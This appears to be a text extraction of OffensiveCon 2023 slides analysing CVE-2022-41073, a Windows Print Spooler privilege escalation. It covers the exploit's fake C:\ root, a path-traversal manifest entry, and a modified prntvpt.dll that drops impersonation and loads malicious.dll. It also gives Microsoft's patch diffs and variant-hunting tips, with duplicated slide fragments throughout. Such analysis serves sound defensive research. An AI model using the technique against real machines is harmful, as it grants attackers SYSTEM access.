OffensiveCon2023.PrintSpooler

Maddie Stone
James Forshaw
OffensiveCon 2023
CVE-2022-41073
https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2022/CVE-2022-41073.html
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41073
Oct 2022 - winspool.drv!LoadNewCopy
HMODULE LoadNewCopy(LPCWSTR DllPath, DWORD dwFlags) {
ULONG_PTR ulCookie;
ActivateActCtx(ACTCTX_EMPTY, &ulCookie);
HMODULE hModule = LoadLibraryExW(DllPath, NULL, dwFlags);
// ...
}
Nov 2022 - winspool.drv!LoadNewCopy
ULONG_PTR ulCookie;
HMODULE hModule;
HANDLE hToken;
+ if (RevertToProcess(&hToken)) {
hModule = LoadLibraryExW(DllPath, NULL, dwFlags);
+ ResumeImpersonation(hToken);
}
// ...
}
https://bugs.chromium.org/p/project-zero/issues/detail?id=240
Impersonating Caller
LoadLibrary(SharedLibrary.dll)
C:\
Windows\System32\SharedLibrary.dll
LoadLibrary(SharedLibrary.dll)
Fake C:\ (MyFakeRoot) C:\
Windows\System32\SharedLibrary.dll Windows\System32\SharedLibrary.dll
https://twitter.com/tiraniddo/status/590931788006084609
C:\MyFakeRoot
├── malicious.dll
├── MyFakeRoot
│ ├── MyFakeRoot.MANIFEST
│ └── prntvpt.dll
├── prntvpt.dll
├── temp.xml
└── Windows
├── System32
│ └── DriverStore
│ └── FileRepository
│ └── prnms003.inf_amd64_454b8d4f31e80f7d
│ └── Amd64
│ └── PrintConfig.dll
└── WinSxS
└── Manifests
├──
amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_792d1c772443f647.manifest
└──
amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_60b5254171f9507e.manifest
C:\MyFakeRoot
├── temp.xml
└── Windows
├── System32
│ └── Amd64
└── WinSxS
└── Manifests
├──
└──
C:\MyFakeRoot
├── temp.xml
└── Windows
├── System32
│ └── Amd64
└── WinSxS
└── Manifests
├──
└──
C:\MyFakeRoot
├── temp.xml
└── Windows
├── System32
│ └── Amd64
└── WinSxS
└── Manifests
├──
└──
C:\MyFakeRoot
├── temp.xml
└── Windows
├── System32
│ └── Amd64
└── WinSxS
└── Manifests
├──
└──
What's in a MANIFEST?
DLL Hell
Application A
Install shared library.
SharedLibrary.dll
(version 2)
C:\Windows\System32
DLL Hell
Application A Application B
Install shared library.
SharedLibrary.dll
(version 1)
C:\Windows\System32
DLL Hell
SharedLibrary.dll
(version 1)
C:\Windows\System32
Side by Side Assemblies
SharedLibrary.dll SharedLibrary.dll
(version 2) (version 1)
C:\Windows\WinSxS
PE Imports
No Version
Information
Version
information but
not detailed
Application Manifest File Identity of the
"Assembly"
<assembly>
<assemblyIdentity name="App.A" version="1.0.0.0"/>
<description>My APP A</description>
<dependency>
<dependentAssembly> Dependencies of this Assembly
<assemblyIdentity
name="SharedLibrary"
version="2.0.0.0" processorArchitecture="*"
publicKeyToken="6595b64144ccf1df" language="*" />
</dependentAssembly>
</dependency>
</assembly>
Using a Manifest
ACTCTX config = {}; Parse manifest file to an activation context

config.cbSize = sizeof(config);
config.lpSource = L"c:\\example.manifest";
HANDLE actctx = CreateActCtx(&config);
ULONG_PTR cookie; Activate and load library

ActivateActCtx(actctx, &cookie);
HMODULE ret = LoadLibrary(L"SharedLibrary.dll");
DeactivateActCtx(0, cookie);
...
Assembly Searching Sequence
CSRSS
SXSSRV
Application A
Application Manifest
<assembly>
...
<dependency>
<dependentAssembly>
<assemblyIdentity
version="2.0.0.0" />
</dependency>
</assembly>
CSRSS
SXSSRV Version 2.0.1234.0
Application A
<assembly>
...
<dependency>
<dependentAssembly>
<assemblyIdentity
version="2.0.0.0" />
</dependency>
HKLM\SOFTWARE\Microsoft\Windows\
</assembly>
CurrentVersion\SideBySide
CSRSS
SXSSRV
Application A
Assembly Manifest
<assembly>
<assemblyIdentity
Application Manifest name="SharedLibrary"
version="2.0.1234.0"/>
<assembly>
<file name="SharedLibrary.dll"/>
...
...
<dependency>
</assembly>
<dependentAssembly>
<assemblyIdentity
version="2.0.0.0" />
</dependency> C:\Windows\WinSxS\Manifests\
</assembly>
amd64_sharedlibrary_6595b64144ccf1df_2.0.1234.0.manifest
CSRSS
SXSSRV
Application A
<assembly>
...
<dependency>
<dependentAssembly>
Activation Context
<assemblyIdentity
version="2.0.0.0" />
</dependency>
</assembly>
Assembly Manifest File
<assembly>
<assemblyIdentity name="SharedLibrary" version="2.0.1234.0"/>
<dependency> More dependencies
<dependentAssembly>
<assemblyIdentity
name="SharedLibrary.resources" version="2.0.0.0"/>
</dependency>
<file name="SharedLibrary.dll"/> Assembly resources
</assembly>
Load DLL From Assembly Directory
Application A C:\Windows\WinSxS\amd64_sharedlibrary_6595b64
144ccf1df_2.0.1234.0
Load
SharedLibrary.dll
LdrLoadDll(...)
Activation Context
SharedLibrary.dll
https://www.microsoft.com/en-us/security/blog/2022/07/27/untangling-knotweed-euro
pean-private-sector-offensive-actor-using-0-day-exploits
Exploiting Activation Context Caching
CSRSS
SXSSRV Key Activation Context Cache
☠Assembly Manifest Assembly Manifest

<assembly> Aliased Key
... <assembly>
<file loadFrom="c:\evil.dll" ...
name="SharedLibrary.dll"/> <file name="SharedLibrary.dll"/>
</assembly> </assembly>
C:\Windows\WinSxS\Manifests\
amd64_sharedlibrary_6595b64144ccf1df_2.0.1234.0.manifest
Malicious Application
CSRSS
☠Assembly Manifest Assembly Manifest

Application
<assembly>
... <assembly> <assembly>
<file loadFrom="c:\evil.dll" ... ...
name="SharedLibrary.dll"/> <dependency> <file name="SharedLibrary.dll"/>
</assembly> <dependentAssembly> </assembly>
<assemblyIdentity
version="2.0.0.0" />
</dependency>
</assembly>
CSRSS
☠Assembly Manifest
Application
<assembly>
...
☠Activation
<file loadFrom="c:\evil.dll"
name="SharedLibrary.dll"/>
</assembly>
Context
evil.dll
Weak Caching Key
https://bugs.chromium.org/p/project-zero/issues/detail?id=1749
https://www.zerodayinitiative.com/blog/2023/1/23/activation-context-cache-poisoning-exploiting-csrss-for-privilege-escalation
Parsing the Manifest during DLL Loading
NTSTATUS BasepProbeForDllManifest(HMODULE DllHandle,
PCWSTR FullDllName,
HANDLE *ActCtx) {
NTSTATUS result = LdrResFindResourceDirectory(DllHandle, Check for isolation
RT_MANIFEST, ISOLATIONAWARE_MANIFEST_RESOURCE_ID); aware manifest
if (NT_SUCCESS(result)) {
ACTCTX config;
config.lpSource = FullDllName; Create an activation context
config.lpResourceName = MAKEINTRESOURCE(ISOLATIONAWARE_MANIFEST_RESOURCE_ID);
config.hModule = DllHandle;
*ActCtx = CreateActCtxW(&context);
if (*ActCtx == INVALID_HANDLE_VALUE) {
return NtCurrentTeb()->LastStatusValue;
}
return result;
The Exploit
C:\MyFakeRoot
├── temp.xml
└── Windows
├── System32
│ └── Amd64
└── WinSxS
└── Manifests
├──
└──
Does PrintConfig.dll have an Isolation Aware Manifest?
ISOLATIONAWARE DLL manifest
Manifest has dependencies

Normal User – MEDIUM integrity SYSTEM integrity
exploit.exe
csrss.exe
Fake C:\ (MyFakeRoot)
C:\Windows\WinSxS
printfilterpipelinesvc.exe
exploit.exe Impersonating Caller
LoadLibrary(PrintConfig.dll)
csrss.exe
C:\Windows\WinSxS
csrss.exe
Fake C:\ (MyFakeRoot) Impersonating Caller
SXSSRV
C:\Windows\WinSxS
csrss.exe
SXSSRV
Windows/WinSxS
C:\Windows\WinSxS
Exploit Adds to Common Controls SxS Manifests
<dependentAssembly>
<assemblyIdentity
name="..\..\..\..\..\..\MyFakeRoot\MyFakeRoot"
version="1.0.0.0"
processorArchitecture="amd64"
language="*"
publicKeyToken="6595b64144ccf1df"
type="win32" />
Exploit Adds to Common Controls SxS Manifests
<dependentAssembly>
<assemblyIdentity
version="1.0.0.0"
language="*"
type="win32" />
csrss.exe
SXSSRV
MyFakeRoot\MyFakeRoot.MANIFEST
C:\Windows\WinSxS
MyFakeRoot.MANIFEST
<assembly>
<assemblyIdentity
version="1.0.0.0"
type="win32" />
<file name="prntvpt.dll"/>
</assembly>
MyFakeRoot.MANIFEST
<assembly>
<assemblyIdentity
version="1.0.0.0"
processorArchitecture="amd64" Redirect prntvpt.dll
type="win32" />
<file name="prntvpt.dll"/>
</assembly>
Activation Context
MyFakeRoot\prntvpt.dll
csrss.exe
SXSSRV
Modification to prntvpt.dll
ATL::_dynamic_initializer_for::AtlBaseModule::()
HMODULE AutoMapNamedElementOnVisit(...) {
SetThreadToken(NULL, NULL);
return LoadLibraryExW(L"C:\\MyFakeRoot\\malicious.dll",
NULL, LOAD_WITH_ALTERED_SEARCH_PATH);
}
Turns off impersonation
}
}
Load final payload DLL.
PrintConfig.dll
(fake) prntvpt.dll
MyFakeRoot\malicious.dll
☠ malicious.dll ☠
Nov 2022 - winspool.drv!LoadNewCopy
ULONG_PTR ulCookie;
HMODULE hModule;
HANDLE hToken;
+ if (RevertToProcess(&hToken)) {
hModule = LoadLibraryExW(DllPath, NULL, dwFlags);
+ ResumeImpersonation(hToken);
}
// ...
}
Dec 2022 - sxssrv!BasepSxsCreateFileStreamEx
DWORD dwAttr = OBJ_CASE_INSENSITIVE;

+ if (AssemblyManifestRedirectTrust::IsEnabled() &&
+ ((dwFlags & 0x7000) == 0x7000)) {
+ dwAttr |= OBJ_IGNORE_IMPERSONATED_DEVICEMAP;
+ }
OBJECT_ATTRIBUTES ObjectAttributes;
InitializeObjectAttributes(&ObjectAttr, &Path, dwAttr, NULL, NULL);
HANDLE hFile;
NtOpenFile(&hFile, FILE_GENERIC_READ, &ObjectAttributes, ...)

+ ((dwFlags & 0x7000) == 0x7000)) {
+ }
HANDLE hFile;

+ ((dwFlags & 0x7000) == 0x7000)) {
+ } Only true if the process explicitly
OBJECT_ATTRIBUTES ObjectAttributes; enabled the mitigation.
HANDLE hFile;

+ ((dwFlags & 0x7000) == 0x7000)) {
+ }
HANDLE hFile;
Dec 2022 - kernel32!BasepCreateActCtx
DWORD dwFlags = 0;
if (AssemblyManifestRedirectTrust::IsEnabled()) {
if (IsSystemProcess())
dwFlags |= 0x1000;
if (NtCurrentTeb()->IsImpersonating)
dwFlags |= 0x2000;
if (((dwFlags & 0x3000) == 0x3000) &&
KernelBaseAssemblyManifestIgnoreImpersonated) {
dwFlags |= 0x4000;
}
}
CsrBasepCreateActCtxCommon(dwFlags, ...);
DWORD dwFlags = 0;
if (IsSystemProcess()) Checks for "System"
dwFlags |= 0x1000; Integrity Level
dwFlags |= 0x2000; Is the thread currently
impersonating?
if (((dwFlags & 0x3000) == 0x3000) &&
dwFlags |= 0x4000;
}
}
DWORD dwFlags = 0;
if (IsSystemProcess())
dwFlags |= 0x1000;
Is mitigation enabled? If
so final flags is 0x7000.
dwFlags |= 0x2000;
if (((dwFlags & 0x3000) == 0x3000) &&
dwFlags |= 0x4000;
}
}
Dec 2022 - kernelbase!SetProcessMitigationPolicy
// ...
+ if (MitigationPolicy == ProcessUserPointerAuthPolicy &&

+ AssemblyManifestRedirectTrust::IsEnabled()) {
+ BOOLEAN bEnable = *(PDWORD)lpBuffer != 0;
+ KernelBaseAssemblyManifestIgnoreImpersonated = bEnable;
+ }
// ...
Enumerated value 17, this is the SDK name which is
clearly wrong!
// ...

+ }
// ...
// ...

+ }
// ... Sets a global

variable.
Jan 2023 - printfilterpipelinesvc!wWinMain
// ...
+ DWORD Policy = TRUE;
+ SetProcessMitigationPolicy(ProcessUserPointerAuthPolicy,
+ &Policy, sizeof(Policy));
// ...
CVE-2022-41073 Root Cause
The user can remap the root drive (C:\) for privileged processes
during impersonation.
A design flaw which has been known about since at least 2015.
Variant Analysis
sv. exe
ol
spo
csrss.exe
SXSSRV
Windows/WinSxS
C:\Windows\WinSxS
May 2022 – localspl.dll
void PrintConfigDataHelper::CreateConfigProviderHandle() {
LPCWSTR lpConfigPath = GetConfigFilePath();
if (lpConfigPath && RevertToPrinterSelf()) {
hModule = LoadLibrary(lpConfigPath);
ImpersonatePrinterClient();
}
// ...
}
May 2022 – spoolsv!EnableMitigations
DWORD Policy = GetSpoolerRedirectionPolicy();
SetProcessMitigationPolicy(ProcessRedirectionTrustPolicy,
&Policy, sizeof(Policy));
// ...
if (MSRC70412_PrintManifestRedirectOptIn::IsEnabled()) {
Policy = TRUE;
SetProcessMitigationPolicy(ProcessUserPointerAuthPolicy,
&Policy, sizeof(Policy));
}
// ...
Find DLL Loads using Process Monitor
Filter Option Match Value Result
User begins with NT AUTHORITY\ Include
Path ends with .dll Include
Operation is CreateFile Include
Detail contains Impersonating: <USER> Include
Detail excludes Execute/Traverse Exclude

Check for the Process Mitigation
Value of 1 indicates mitigation is set.

Check for Isolation Aware Manifest
Needs to be "IsolationAware"
Has at least one dependency.

Debugging SXS Loading
Start SXS trace
C:\> sxstrace Trace -logfile:my_trace.log
Parse SXS trace to a text file

C:\> sxstrace Parse -logfile:my_trace.log -outfile:my_trace.txt
INFO: Resolving reference

..\..\..\..\..\..\MyFakeRoot\MyFakeRoot,language="*",pr
ocessorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="1.0.0.0".
INFO: Begin assembly probing.
INFO: Did not find the assembly in WinSxS.
INFO: Attempt to probe manifest at
C:\WINDOWS\assembly\GAC_64\..\..\..\..\..\..\MyFakeRoot\MyFakeRoot\1.0.0.0_en-US_6595b64144ccf
1df\..\..\..\..\..\..\MyFakeRoot\MyFakeRoot.DLL.
DEMO
Final Thoughts
Thank you!
Maddie Stone
James Forshaw

OffensiveCon2023.PrintSpooler

Uploaded by

Document Informationclick to expand document informationasdfasdf

Document Informationclick to expand document information

Copyright:

Available Formats

OffensiveCon2023.PrintSpooler

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

OffensiveCon2023.PrintSpooler

Uploaded by

Copyright:

Available Formats

Maddie Stone

Fake C:\ (MyFakeRoot) C:\

Install shared library.

Install shared library.

ACTCTX config = {}; Parse manifest file to an activation context

ULONG_PTR cookie; Activate and load library

☠Assembly Manifest Assembly Manifest

☠Assembly Manifest Assembly Manifest

ISOLATIONAWARE DLL manifest

Manifest has dependencies

Fake C:\ (MyFakeRoot)

exploit.exe Impersonating Caller

Fake C:\ (MyFakeRoot)

exploit.exe Impersonating Caller

Fake C:\ (MyFakeRoot) Impersonating Caller

exploit.exe Impersonating Caller

Fake C:\ (MyFakeRoot) Impersonating Caller

exploit.exe Impersonating Caller

Fake C:\ (MyFakeRoot) Impersonating Caller

Fake C:\ (MyFakeRoot)

DWORD dwAttr = OBJ_CASE_INSENSITIVE;

DWORD dwAttr = OBJ_CASE_INSENSITIVE;

DWORD dwAttr = OBJ_CASE_INSENSITIVE;

DWORD dwAttr = OBJ_CASE_INSENSITIVE;

+ if (MitigationPolicy == ProcessUserPointerAuthPolicy &&

+ if (MitigationPolicy == ProcessUserPointerAuthPolicy &&

+ if (MitigationPolicy == ProcessUserPointerAuthPolicy &&

// ... Sets a global

exploit.exe Impersonating Caller

Fake C:\ (MyFakeRoot) Impersonating Caller

Filter Option Match Value Result

User begins with NT AUTHORITY\ Include

Path ends with .dll Include

Operation is CreateFile Include

Detail contains Impersonating: <USER> Include

Detail excludes Execute/Traverse Exclude

Value of 1 indicates mitigation is set.

Has at least one dependency.

C:\> sxstrace Trace -logfile:my_trace.log

Parse SXS trace to a text file

INFO: Resolving reference

You might also like